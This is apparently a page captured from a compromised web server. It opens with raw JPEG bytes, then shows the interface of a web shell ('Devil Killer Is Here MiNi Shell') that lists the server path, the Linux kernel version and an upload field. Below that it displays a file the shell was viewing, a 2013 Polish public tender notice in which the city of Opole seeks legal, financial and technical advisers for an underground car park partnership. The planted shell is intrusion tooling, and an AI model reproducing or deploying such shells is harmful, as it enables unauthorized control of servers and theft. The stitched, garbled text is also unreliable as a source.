JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/409936-N-2013.html

<p class="kh_header"><b>Opole: Wykonanie kompleksowych usług doradczych prawniczych, finansowo - ekonomicznych i technicznych dla Gminy Opole, w postępowaniu dotyczącym wyboru partnera prywatnego lub koncesjonariusza do realizacji przedsięwzięcia inwestycyjnego pod nazwą : Budowa wielokondygnacyjnego parkingu podziemnego na placu Mikołaja Kopernika w Opolu  wraz z zagospodarowaniem powierzchni placu i w zawarciu właściwej umowy z wybranym partnerem.</b><br>
<b>Numer ogłoszenia: 409936 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto  Opole , Rynek-Ratusz, 45-015 Opole, woj. opolskie, tel. 77 451 19 21, 77 451 19 22, faks 77 454 98 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompleksowych usług doradczych prawniczych, finansowo - ekonomicznych i technicznych dla Gminy Opole, w postępowaniu dotyczącym wyboru partnera prywatnego lub koncesjonariusza do realizacji przedsięwzięcia inwestycyjnego pod nazwą : Budowa wielokondygnacyjnego parkingu podziemnego na placu Mikołaja Kopernika w Opolu  wraz z zagospodarowaniem powierzchni placu i w zawarciu właściwej umowy z wybranym partnerem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowego doradztwa w zakresie usług prawniczych, finansowo - ekonomicznych i technicznych obejmujących w szczególności: udzielanie porad i konsultacji, opracowywanie projektów uchwał, zarządzeń, umów, ogłoszeń, analiz i innych niezbędnych dokumentów, a także opinii prawnych, oraz uczestniczenie w spotkaniach organizowanych przez Gminę Opole, zwaną dalej Zamawiającym, w postępowaniu dotyczącym wyboru partnera prywatnego lub koncesjonariusza do realizacji przedsięwzięcia inwestycyjnego pod nazwą :Budowa  wielokondygnacyjnego parkingu podziemnego na placu Mikołaja Kopernika w Opolu wraz z zagospodarowaniem powierzchni placu. 
Parking (garaż podziemny) zlokalizowany będzie na placu Mikołaja Kopernika położonym w centrum miasta Opola. W powiązaniu z przyległymi obiektami użyteczności publicznej stanowi potencjalnie jedno z najważniejszych wnętrz urbanistycznych śródmieścia Opola. 
Przedsięwzięcie obejmować będzie budowę wielokondygnacyjnego parkingu podziemnego łącznie z prawem do zabudowy wielkopowierzchniowym obiektem handlowym części nieruchomości, która w założeniach Zamawiającego stanowić będzie wkład Zamawiającego.
Łączna powierzchnia obszaru przeznaczonego pod przedsięwzięcie objęte partnerstwem publiczno - prywatnym wynosi ok. 0,61 ha. Działki są własnością Gminy Opole. Dla ww. nieruchomości toczy się postępowanie podziałowe. (Mapka nr 1 - poglądowa z zaznaczonym obszarem w załączeniu) 
W obrębie ww. obszaru położona jest działka nr 81/2, km 44, obręb Opole będąca własnością Skarbu Państwa, na której  znajduje się stacja trafo należąca do firmy Tauron. 
Na przedmiotowym terenie obowiązuje miejscowy plan zagospodarowania przestrzennego przyjęty uchwałą nr XLV/699/13 Rady Miasta Opola z dnia 15 lipca 2013 r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego plac M. Kopernika - ulica Studzienna w Opolu.

Szczegółowy opis przedmiotu zamówienia:
1.Przygotowanie i przedstawienie Zamawiającemu dokumentów oraz wykonanie usług niezbędnych do rozpoczęcia i przeprowadzenia postępowania o wybór partnera prywatnego albo koncesjonariusza, w oparciu o art. 4 ustawy z dnia 19 grudnia 2008r. o partnerstwie publiczno - prywatnym (Dz. U. z 2009r, Nr 19, poz. 100). Na ww. zakres prac składać się będzie:
a)Wykonanie technicznych analiz przedrealizacyjnych dla inwestycji, w tym programu funkcjonalno - użytkowego lub charakterystyki, o której mowa w art. 7 ustawy z dnia 9 stycznia 2009r. o koncesji na roboty budowlane i usługi (Dz. U. z 2009r., Nr 101, poz. 101), i wskazanie wariantu, który będzie przedmiotem analiz ekonomicznych, prawnych i elementem uzgodnień technicznych.
b)wykonanie analizy prawno - ekonomicznej (studium wykonalności) przedsięwzięcia wskazującej najbardziej optymalny dla Gminy Opole sposób jego realizacji oraz wskazanie najbardziej optymalnego sposobu finansowania przedsięwzięcia w fazie realizacyjnej i eksploatacyjnej oraz rekomendowanie Zamawiającemu najkorzystniejszego rozwiązania;
c)Program funkcjonalno - użytkowy, o którym mowa w ppkt a) powinien zostać wykonany zgodnie obowiązującymi przepisami prawa,  zwłaszcza z: 
Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz.1623 z późn. zmianami)   i wszystkimi  wydanymi  na jej podstawie aktami wykonawczymi;
Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. Nr 75, poz. 690 z późn. zmianami);
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004, Nr 202, poz. 2072 z późn. zmianami);
Ustawą Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.);
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych  kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004r., nr 130, poz. 1389).
d)Charakterystyka, o której mowa w ppkt a) powinna zostać wykonana zgodnie z zaleceniami Zamawiającego oraz zgodnie z obowiązującymi przepisami, a zwłaszcza z :
Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz.1623 z późn. zmianami) i wszystkimi  wydanymi  na jej podstawie aktami wykonawczymi;
Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. Nr 75, poz. 690 z późn. zmianami);
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004, Nr 202, poz. 2072 z późn. zmianami), w szczególności z następującymi paragrafami;
§ 15 w całości 
§ 16 w całości, 
§ 17 w całości, 
§ 18 w całości
§ 19 pkt 1, 2, 3, 4 ppkt. a, g, h oraz i;
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych  kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004r., nr 130, poz. 1389).
e)Program funkcjonalno - użytkowy lub charakterystyka winny zawierać szacunek kosztów umożliwiający wykonanie analiz, o których mowa w ppkt b);
f)Wykonawca opracowując program funkcjonalno - użytkowy lub charakterystykę nie może używać znaków towarowych zastosowanych materiałów i urządzeń, które należy opisać poprzez parametry i właściwości techniczne;
g)Zakup mapy do celów projektowych spoczywać będzie na Wykonawcy;
h)Analiza, o której mowa w ppkt b) powinna obejmować w szczególności: 
opracowanie analizy sposobów realizacji przedsięwzięcia,
analizę ekonomiczno - finansową każdego ze sposobów realizacji przedsięwzięcia, 
analizę organizacyjno - prawną wykonalności każdego ze sposobów realizacji przedsięwzięcia,zdefiniowanie ryzyk
2.W zależności od zaproponowanych przez Wykonawcę rozwiązań, po ich zaakceptowaniu przez Zamawiającego, przygotowanie dokumentacji niezbędnej do wyłonienia partnera prywatnego lub koncesjonariusza, w tym w szczególności projektów uchwał rady miasta.
3.Opracowanie pełnej listy dokumentów o charakterze prawnym, finansowo - ekonomicznym i technicznym, jakimi powinien dysponować Zamawiający, aby  w sposób należyty wyłonić partnera prywatnego lub koncesjonariusza,
4.Opracowanie opisu potrzeb i wymagań podmiotu publicznego,
5.Opracowanie dokumentacji określającej kryteria oceny ofert, w tym:
finansowo-ekonomiczne,
techniczne,
prawne,
6.Opracowanie szczegółowego harmonogramu działań obejmującego przygotowanie i wybór partnera prywatnego lub koncesjonariusza,
7.Opracowanie treści ogłoszeń wymaganych właściwymi przepisami,
8.opracowanie instrukcji dla potencjalnych inwestorów wraz z wymaganiami formalno - prawnymi oraz założeń do umowy o partnerstwie publiczno - prywatnym lub koncesji,
9.opracowanie innych dokumentów niezbędnych na etapie ogłoszenia o partnerstwie publiczno - prywatnym lub koncesji.
10.Opracowanie wstępnych propozycji rozwiązań komunikacyjnych dla obszarów sąsiadujących  i newralgicznych dla planowanej inwestycji wraz z przybliżonymi kosztami realizacji zaproponowanych rozwiązań (mapka nr 2 w załączeniu)
11.Wsparcie miasta w zainteresowaniu inwestorów projektem, w tym:
a)przygotowanie podstawowych informacji o charakterze prawnym, finansowo - ekonomicznym i technicznym dla potencjalnych zainteresowanych partnerów, 
b)współpraca z Zamawiającym przy organizacji seminariów lub spotkań z potencjalnymi inwestorami/partnerami.
12.Wykonanie w zależności od przyjętego przez Zamawiającego trybu wyboru partnera prywatnego opisu przedmiotu zamówienia, w oparciu o art. 4  ustawy z dnia 19 grudnia 2008r. o partnerstwie publiczno - prywatnym, z zastosowaniem zasady, o której mowa w pkt. 1 ppkt f). 
13.Przeprowadzenie analizy pod względem formalno - prawnym, finansowo-ekonomicznym oraz technicznym złożonych Wniosków o dopuszczenie do udziału w postępowaniu i kwalifikacja Kandydatów, w tym:
a)badanie kompletności i treści złożonych Wniosków,
b)opracowanie dla Zamawiającego ewentualnych pytań do Kandydatów z żądaniem wyjaśnień treści złożonych Wniosków;
c)analiza i ocena złożonych przez Kandydatów wyjaśnień;
d)opracowanie i przedstawienie Zamawiającemu raportu z analizy i oceny Wniosków, zawierającego propozycje w zakresie kwalifikacji potencjalnych Inwestorów do dalszego udziału 
w postępowaniu,
e)przygotowanie pism informujących o wynikach oceny spełniania warunków udziału w postępowaniu i otrzymanych ocenach spełniania tych warunków
14.W zależności od wybranego sposobu realizacji przedsięwzięcia wynikającego z przeprowadzonej analizy prawno - ekonomicznej (studium wykonalności) przedsięwzięcia, przygotowanie: 
a)opisu warunków planowanego partnerstwa publiczno-prywatnego lub koncesji,
b)projektu umowy o partnerstwie publiczno - prywatnym lub koncesji.
15.Przygotowanie treści zaproszenia, które Zamawiający prześle wszystkim Kandydatom spełniającym warunki udziału w postępowaniu i zakwalifikowanym do przeprowadzenia negocjacji.
16.Udział w negocjacjach z Kandydatami w celu uzupełnienia opisu przedmiotu przedsięwzięcia lub warunków umowy o partnerstwie publiczno - prywatnym lub koncesji. 
17.Przygotowywanie wszelkich wymagań, wyjaśnień i informacji, a także dokumentów związanych z negocjacjami.
18.Przygotowanie zaproszenia do składania ofert oraz ewentualnie doprecyzowanie bądź uzupełnienie po przeprowadzonych negocjacjach warunków realizacji partnerstwa publiczno - prywatnego lub koncesji.
19.Opracowywanie ewentualnych wyjaśnień do treści opisu warunków realizacji przedsięwzięcia w formie odpowiedzi na pytania zadawane przez Oferentów.
20.Przeprowadzenie analizy i oceny ofert pod względem formalno - prawnym, finansowo - ekonomicznym oraz technicznym.
21.Opracowanie ewentualnej listy pytań dotyczących treści złożonych ofert wymagających wyjaśnień od Oferentów.
22.Opracowanie i przedstawienie Zamawiającemu raportu z analizy i oceny Ofert. Przygotowanie propozycji wyboru najkorzystniejszej Oferty pod względem formalno - prawnym, finansowo - ekonomicznym oraz technicznym,
23.Przygotowanie propozycji pism informujących uczestników postępowania o wyniku postępowania.
24.Przygotowanie ostatecznej wersji umowy o partnerstwie publiczno - prywatnym lub koncesji, którą Zamawiający podpisze z wybranym na podstawie przeprowadzonego postępowania  partnerem prywatnym lub koncesjonariuszem.
25.Zapewnienie obsługi prawnej w trakcie całego postępowania, nadzór nad zgodnością postępowania z przepisami prawa, zgłaszanie zastrzeżeń i wyjaśnianie wątpliwości.
26.W przypadku wniesienia skarg przez Oferentów, na czynności podjęte przez Zamawiającego świadczenie pomocy prawnej do czasu ostatecznego rozstrzygnięcia, ewentualny udział  w postępowaniu sądowym toczącym się przed Sądem Administracyjnym, w charakterze pełnomocnika Zamawiającego.
27.Zapewnienie doradztwa prawnego w trakcie całego postępowania,
28.Zapewnienie doradztwa finansowo - ekonomicznego w trakcie całego postępowania.
29.Zapewnienie doradztwa technicznego w trakcie całego postępowania, 
30.Przygotowanie wszelkich dokumentów o charakterze formalno - prawnym, ekonomicznym   lub technicznym niezbędnych do prawidłowego przeprowadzenia wyboru partnera prywatnego lub koncesjonariusza.
31.Udział przedstawicieli Wykonawcy, posiadających odpowiednią wiedzę i doświadczenie, w pracach Zespołu ds. wyboru partnera prywatnego, w charakterze Członka Zespołu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.10.00.00-5, 79.11.00.00-8, 79.11.10.00-5, 79.14.00.00-7, 79.30.00.00-7, 66.17.10.00-9, 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem do wykazu dokumentu potwierdzającego, że te usługi zostały wykonane należycie. Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże :
1)co najmniej 1 zamówienie, którego przedmiotem było wykonanie analiz finansowo - ekonomicznych przedsięwzięcia (studium wykonalności) dla projektu o wartości co najmniej 25 mln zł.
2)co najmniej 1 zamówienie, którego przedmiotem było wykonanie programu funkcjonalno - użytkowego przedsięwzięcia dla projektu o wartości co najmniej 25 mln zł.
3)co najmniej 1 zamówienie, którego przedmiotem było wykonanie doradztwa prawnego  w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie                            i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi, ustawy o autostradach płatnych i Krajowym Funduszu Drogowym), obiektów infrastruktury technicznej lub społecznej, i dla którego wartość nakładów inwestycyjnych wyniosła co najmniej 25 mln zł, od wszczęcia postępowania do jego zakończenia przez podpisanie umowy.
4)co najmniej 1 zamówienie, którego przedmiotem było wykonanie doradztwa finansowo - ekonomicznego w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie  i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi, ustawy  o autostradach płatnych i Krajowym Funduszu Drogowym), obiektów infrastruktury technicznej lub społecznej, i dla którego wartość nakładów inwestycyjnych wyniosła co najmniej 25 mln zł, od wszczęcia postępowania do jego zakończenia przez podpisanie umowy.
5)co najmniej 1 zamówienie, którego przedmiotem było wykonanie doradztwa technicznego w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie                            i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi, ustawy o autostradach płatnych i Krajowym Funduszu Drogowym), obiektów infrastruktury technicznej lub społecznej, i dla którego wartość nakładów inwestycyjnych wyniosła  co najmniej 25 mln zł, od wszczęcia postępowania do jego zakończenia przez podpisanie umowy.
Warunki wyrażone  od 1) do 5) należy traktować łącznie. 
W przypadku wykazania doświadczenia, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia tego doświadczenia wystawione przez podmiot udostępniający. Wzór wykazu załączono do SIWZ. Zobowiązanie winno być złożone w oryginale. 

Zobowiązanie winno zawierać:
- nazwę podmiotu udostępniającego,
- nazwę podmiotu przyjmującego,
- okres jakiego dotyczy (czas) udostępnienie,
- zakres dostępnych Wykonawcy zasobów innego podmiotu (np. doświadczenie, osoby, sprzęt),
- zakres udziału innego podmiotu (np. jaki zakres zamówienia, jaka część zamówienia, jaki rodzaj usług)
- sposób wykorzystania zasobów innego podmiotu przez Wykonawcę ( np. konsultacja, analiza, szkolenia,  
   doradztwo, czynny udział - podwykonawstwo, oddelegowanie osób), 
- charakter stosunku Wykonawcy z podmiotem udostępniającym (np. umowa cywilnoprawna, umowa o pracę).

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych                do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa).       

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże: 

1) Osoba z wyższym wykształceniem kierująca zespołem i nadzorująca realizację Zamówienia powinna posiadać doświadczenie zawodowe w zakresie kierowania usługami doradczymi dla przygotowania i przeprowadzenia co najmniej jednego postępowania na realizację inwestycji w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, zakończonym podpisaniem umowy z partnerem prywatnym.
2)Zespołem, w którym powinni znaleźć się:
a) co najmniej 1 osoba posiadająca wykształcenie prawnicze i doświadczenie w zakresie organizacyjno - prawnej obsługi przygotowania i przeprowadzenia co najmniej jednego postępowania na wybór partnera prywatnego lub koncesjonariusza dla inwestycji realizowanej w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, 
b) co najmniej 1 osoba posiadająca wykształcenie wyższe z ekonomii i finansów, posiadająca doświadczenie w wykonywaniu co najmniej 5 analiz ekonomiczno - finansowych, lub 5 studiów wykonalności.
Wykonawca realizujący zamówienie powinien dysponować Zespołem,  w którym powinny znaleźć się osoby posiadające w zakresie swoich specjalności wykształcenie wyższe/wyższe techniczne i wymagane uprawnienia do sprawowania samodzielnych funkcji technicznych oraz doświadczenie w zakresie realizacji podobnych obiektów, konstrukcji bądź instalacji. Wymaga się, aby w skład zespołu wchodziły m.in.:
3) projektant lub projektanci :
z uprawnieniami w specjalności architektonicznej bez ograniczeń , 
z uprawnieniami w specjalności konstrukcyjno - budowlanej bez ograniczeń ,
z uprawnieniami w specjalności drogowej bez ograniczeń ,  
z uprawnieniami w specjalności instalacyjnej w zakresie sieci, instalacji  urządzeń 
cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych , 
z uprawnieniami w specjalności sieci i instalacji elektrycznych.   
Zakres może być spełniony przez jedną osobę lub kilka. 
4) rzeczoznawca z zakresu geoinżynierii,
5) kosztorysant.
Przez niezbędne doświadczenie ww. osób rozumie się udział w realizacji usługi lub robót budowlanych w zakresie posiadanego wykształcenia i uprawnień, o wartości co najmniej 25 mln zł. Wzór oświadczenia załączono do SIWZ.
Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania  do pracy osoby/osób wskazanych w oświadczeniu. W przypadkach losowych wykluczających zatrudnienie osoby/ osób wskazanych w oświadczeniu, Wykonawca będzie zobowiązany do zatrudnienia osoby/ osób  o tych samych kwalifikacjach zawodowych niezbędnych do wykonania zamówienia, a także wykonywanych przez nią czynności. 

W przypadku wykazania w wykazie osoby/ osób, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia danej osoby/ osób, wystawione przez podmiot udostępniający. Zobowiązanie należy złożyć w oryginale. 


Zobowiązanie winno zawierać:
- nazwę podmiotu udostępniającego,
- nazwę podmiotu przyjmującego,
- okres jakiego dotyczy (czas) udostępnienie,
- zakres dostępnych Wykonawcy zasobów innego podmiotu (np. doświadczenie, osoby, sprzęt),
- zakres udziału innego podmiotu (np. jaki zakres zamówienia, jaka część zamówienia, jaki rodzaj usług)
- sposób wykorzystania zasobów innego podmiotu przez Wykonawcę (czynny udział,  oddelegowanie), 
- charakter stosunku Wykonawcy z podmiotem udostępniającym (np. umowa cywilnoprawna, umowa  o pracę).
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych                do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa).       

